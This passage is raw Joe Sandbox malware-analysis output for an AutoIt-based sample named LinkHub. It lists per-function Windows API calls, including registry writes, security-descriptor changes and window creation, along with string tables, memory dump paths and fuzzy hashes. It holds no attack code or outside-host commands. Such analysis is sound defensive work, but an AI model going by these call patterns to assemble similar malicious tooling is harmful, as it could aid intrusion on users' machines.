                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 7b74be87bf2fcd6ea46497721977b9f8b73ef86898319271ee0f62b6d8c7eb9d
                                                                    • Instruction ID: 7ea8d88d6c11a458e52c429e71dfa1fa440c28feaa8fc5026d429befc251873a
                                                                    • Opcode Fuzzy Hash: 7b74be87bf2fcd6ea46497721977b9f8b73ef86898319271ee0f62b6d8c7eb9d
                                                                    • Instruction Fuzzy Hash: 0FB15D71A11605AFEB14DFA8DC49FAEBBA9EB08710F008519FA15E7290C774ED10CFA0
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002B5532
                                                                    • GetDriveTypeW.KERNEL32(?,002DDC30,?,\\.\,002DDCD0), ref: 002B560F
                                                                    • SetErrorMode.KERNEL32(00000000,002DDC30,?,\\.\,002DDCD0), ref: 002B577B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: 11c50acbafecec5b573f90d73f0ba9831a03b8d6c8131a34b1c25161734ac895
                                                                    • Instruction ID: 0d2f4c21c150852c3548128868733ccfe68fb8189790367817805ff46faca5ed
                                                                    • Opcode Fuzzy Hash: 11c50acbafecec5b573f90d73f0ba9831a03b8d6c8131a34b1c25161734ac895
                                                                    • Instruction Fuzzy Hash: 1561D430F75916DBC725DF24C9A5AF8B3A1EF14390B248056E406AF291CB71ED23EB51
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002425F8
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00242600
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0024262B
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00242633
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00242658
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00242675
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00242685
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002426B8
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002426CC
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 002426EA
                                                                    • GetStockObject.GDI32(00000011), ref: 00242706
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00242711
                                                                      • Part of subcall function 002419CD: GetCursorPos.USER32(?), ref: 002419E1
                                                                      • Part of subcall function 002419CD: ScreenToClient.USER32(00000000,?), ref: 002419FE
                                                                      • Part of subcall function 002419CD: GetAsyncKeyState.USER32(00000001), ref: 00241A23
                                                                      • Part of subcall function 002419CD: GetAsyncKeyState.USER32(00000002), ref: 00241A3D
                                                                    • SetTimer.USER32(00000000,00000000,00000028,0024199C), ref: 00242738
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: <)1$<)1$AutoIt v3 GUI$(1$(1$(1
                                                                    • API String ID: 1458621304-3112006725
                                                                    • Opcode ID: 77e43fa36e3a31cef67508f9fc10f5183175cb6ae20a21ec3c881f7c161cebac
                                                                    • Instruction ID: 0c0e94f8b25be50e94234c3ce323a777c8daed4d18fa886aa385d69e6e2fdb1c
                                                                    • Opcode Fuzzy Hash: 77e43fa36e3a31cef67508f9fc10f5183175cb6ae20a21ec3c881f7c161cebac
                                                                    • Instruction Fuzzy Hash: 75B16A35A1120ADFDB19DFA8DC89BAE7BB8FB48714F104219FA15A7290D770E860CF50
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 002D1BC4
                                                                    • GetDesktopWindow.USER32 ref: 002D1BD9
                                                                    • GetWindowRect.USER32(00000000), ref: 002D1BE0
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D1C35
                                                                    • DestroyWindow.USER32(?), ref: 002D1C55
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002D1C89
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D1CA7
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002D1CB9
                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 002D1CCE
                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 002D1CE1
                                                                    • IsWindowVisible.USER32(00000000), ref: 002D1D3D
                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002D1D58
                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002D1D6C
                                                                    • GetWindowRect.USER32(00000000,?), ref: 002D1D84
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 002D1DAA
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 002D1DC4
                                                                    • CopyRect.USER32(?,?), ref: 002D1DDB
                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 002D1E46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: e5e0cf445172e65c4709d2c1ddb3991398b4906c78fcd10b19d86ec10893b0a4
                                                                    • Instruction ID: 0b9fa028c5bc554d040e0e6c40aeba1a1c90710bfd4a6d90944fc5fbd86409a1
                                                                    • Opcode Fuzzy Hash: e5e0cf445172e65c4709d2c1ddb3991398b4906c78fcd10b19d86ec10893b0a4
                                                                    • Instruction Fuzzy Hash: CAB18C71624301AFD714DF64D888B6ABBE5FF84310F00891AF9999B2A1C771EC64CB92
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 002D0D81
                                                                    • _wcslen.LIBCMT ref: 002D0DBB
                                                                    • _wcslen.LIBCMT ref: 002D0E25
                                                                    • _wcslen.LIBCMT ref: 002D0E8D
                                                                    • _wcslen.LIBCMT ref: 002D0F11
                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002D0F61
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002D0FA0
                                                                      • Part of subcall function 0025FD52: _wcslen.LIBCMT ref: 0025FD5D
                                                                      • Part of subcall function 002A2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002A2BA5
                                                                      • Part of subcall function 002A2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A2BD7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                    • API String ID: 1103490817-719923060
                                                                    • Opcode ID: a98b5acc968427402d6109c2e9f520a4eaa9fc7afb34489b13a9816d43616b6b
                                                                    • Instruction ID: 387ad78f4e25d98b008da55f5bb3b08a99be26f200876d603574a6936c743890
                                                                    • Opcode Fuzzy Hash: a98b5acc968427402d6109c2e9f520a4eaa9fc7afb34489b13a9816d43616b6b
                                                                    • Instruction Fuzzy Hash: BFE1E2312282429FC714EF28C59096AB3E6FF88314F14496EF896977A1DB30ED65CB51
                                                                    APIs
                                                                      • Part of subcall function 002A1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A1A60
                                                                      • Part of subcall function 002A1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A6C
                                                                      • Part of subcall function 002A1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A7B
                                                                      • Part of subcall function 002A1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A82
                                                                      • Part of subcall function 002A1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A1A99
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002A1741
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002A1775
                                                                    • GetLengthSid.ADVAPI32(?), ref: 002A178C
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 002A17C6
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002A17E2
                                                                    • GetLengthSid.ADVAPI32(?), ref: 002A17F9
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002A1801
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 002A1808
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002A1829
                                                                    • CopySid.ADVAPI32(00000000), ref: 002A1830
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002A185F
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002A1881
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002A1893
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A18BA
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A18C1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A18CA
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A18D1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A18DA
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A18E1
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 002A18ED
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A18F4
                                                                      • Part of subcall function 002A1ADF: GetProcessHeap.KERNEL32(00000008,002A14FD,?,00000000,?,002A14FD,?), ref: 002A1AED
                                                                      • Part of subcall function 002A1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002A14FD,?), ref: 002A1AF4
                                                                      • Part of subcall function 002A1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002A14FD,?), ref: 002A1B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: 0827c57240cd6042920581587fa7081c84c20ab242aa648b6067b3b9a86b4cc9
                                                                    • Instruction ID: b488c3af743ac8e7ab572e76ebfd80ba61d4cb85b5cfa5702133c08928a475a9
                                                                    • Opcode Fuzzy Hash: 0827c57240cd6042920581587fa7081c84c20ab242aa648b6067b3b9a86b4cc9
                                                                    • Instruction Fuzzy Hash: 26716D72D1120ABFEB10DFA4EC48FAEBBB9EF45311F144116E915A7190DB349D25CB60
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002CCF1D
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,002DDCD0,00000000,?,00000000,?,?), ref: 002CCFA4
                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 002CD004
                                                                    • _wcslen.LIBCMT ref: 002CD054
                                                                    • _wcslen.LIBCMT ref: 002CD0CF
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 002CD112
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 002CD221
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 002CD2AD
                                                                    • RegCloseKey.ADVAPI32(?), ref: 002CD2E1
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002CD2EE
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 002CD3C0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 9721498-966354055
                                                                    • Opcode ID: a1ec9e0ebf9f589123b07610e3c7bc80ba989cf3db9ee49ac933240df401dce8
                                                                    • Instruction ID: 18f6d883c2d679b8e2bb095fc2117a5cbf74efc6469dc94c75412b6a7f70bfe2
                                                                    • Opcode Fuzzy Hash: a1ec9e0ebf9f589123b07610e3c7bc80ba989cf3db9ee49ac933240df401dce8
                                                                    • Instruction Fuzzy Hash: 8E1258356246019FD719EF14C881F2AB7E5AF88714F14859DF98A9B3A2CB31EC51CF81
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 002D1462
                                                                    • _wcslen.LIBCMT ref: 002D149D
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D14F0
                                                                    • _wcslen.LIBCMT ref: 002D1526
                                                                    • _wcslen.LIBCMT ref: 002D15A2
                                                                    • _wcslen.LIBCMT ref: 002D161D
                                                                      • Part of subcall function 0025FD52: _wcslen.LIBCMT ref: 0025FD5D
                                                                      • Part of subcall function 002A3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002A3547
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 1103490817-4258414348
                                                                    • Opcode ID: 6bf8471dee67d94ff284a8ec069019e4155e5d9790ed339bc5ecde30d3f1edaa
                                                                    • Instruction ID: 1377d94ad752b3997ddc862b238b21eefa3c5f0e83ad0a3509e9a1af43a7e2eb
                                                                    • Opcode Fuzzy Hash: 6bf8471dee67d94ff284a8ec069019e4155e5d9790ed339bc5ecde30d3f1edaa
                                                                    • Instruction Fuzzy Hash: F7E1BF356243029FC714EF24C45086AB7E6FF94314B54895EF8969BBA2CB30ED65CF81
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 1256254125-909552448
                                                                    • Opcode ID: 66114bfaa91c82ebbc607980febbfb2bf62a297a06be99d76f16f2ea996804af
                                                                    • Instruction ID: 71cf7508aedb3398b761fc3f23dddc7fd909016d4c570c6ea34573cc60b92055
                                                                    • Opcode Fuzzy Hash: 66114bfaa91c82ebbc607980febbfb2bf62a297a06be99d76f16f2ea996804af
                                                                    • Instruction Fuzzy Hash: 8671E43263052B8BCB209F3CDD50FBB33A5AF60798B61023DE85697294EA31DD65C790
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 002D8DB5
                                                                    • _wcslen.LIBCMT ref: 002D8DC9
                                                                    • _wcslen.LIBCMT ref: 002D8DEC
                                                                    • _wcslen.LIBCMT ref: 002D8E0F
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002D8E4D
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002D6691), ref: 002D8EA9
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002D8EE2
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002D8F25
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002D8F5C
                                                                    • FreeLibrary.KERNEL32(?), ref: 002D8F68
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002D8F78
                                                                    • DestroyIcon.USER32(?,?,?,?,?,002D6691), ref: 002D8F87
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002D8FA4
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002D8FB0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 799131459-1154884017
                                                                    • Opcode ID: 81a1950e3c2a2c23a7eacfd21549ff8485de1a4265cfe4497c38428d575084fb
                                                                    • Instruction ID: fbd8d2b3daf40567178d41e930de0997538b85598b7451086b749eb55b4c1868
                                                                    • Opcode Fuzzy Hash: 81a1950e3c2a2c23a7eacfd21549ff8485de1a4265cfe4497c38428d575084fb
                                                                    • Instruction Fuzzy Hash: BF61DF71A20619BEEB14DF64DC45BBE77A8BF08B10F104607F915D62D1DBB4ADA0CBA0
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?), ref: 002B493D
                                                                    • _wcslen.LIBCMT ref: 002B4948
                                                                    • _wcslen.LIBCMT ref: 002B499F
                                                                    • _wcslen.LIBCMT ref: 002B49DD
                                                                    • GetDriveTypeW.KERNEL32(?), ref: 002B4A1B
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B4A63
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B4A9E
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B4ACC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 1839972693-4113822522
                                                                    • Opcode ID: 93c2edf6c02acfddd2eb25a38241e1ee189c231f5990b3c593eaf154cac6e9ee
                                                                    • Instruction ID: 726ad860484b0a87828a78ec49449b03cbafae0e6cafe235a7fec15b27cd69d2
                                                                    • Opcode Fuzzy Hash: 93c2edf6c02acfddd2eb25a38241e1ee189c231f5990b3c593eaf154cac6e9ee
                                                                    • Instruction Fuzzy Hash: 0E71F4329286029FC714EF34C8909ABB7E4FF54798F10492DF895972A2EB30ED55CB91
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 002A6395
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002A63A7
                                                                    • SetWindowTextW.USER32(?,?), ref: 002A63BE
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 002A63D3
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 002A63D9
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002A63E9
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 002A63EF
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002A6410
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002A642A
                                                                    • GetWindowRect.USER32(?,?), ref: 002A6433
                                                                    • _wcslen.LIBCMT ref: 002A649A
                                                                    • SetWindowTextW.USER32(?,?), ref: 002A64D6
                                                                    • GetDesktopWindow.USER32 ref: 002A64DC
                                                                    • GetWindowRect.USER32(00000000), ref: 002A64E3
                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 002A653A
                                                                    • GetClientRect.USER32(?,?), ref: 002A6547
                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 002A656C
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002A6596
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                    • String ID:
                                                                    • API String ID: 895679908-0
                                                                    • Opcode ID: b4ec3175b8650e44814c1c302597c114c7afbcfe82cac48c9b19fa332b906c1e
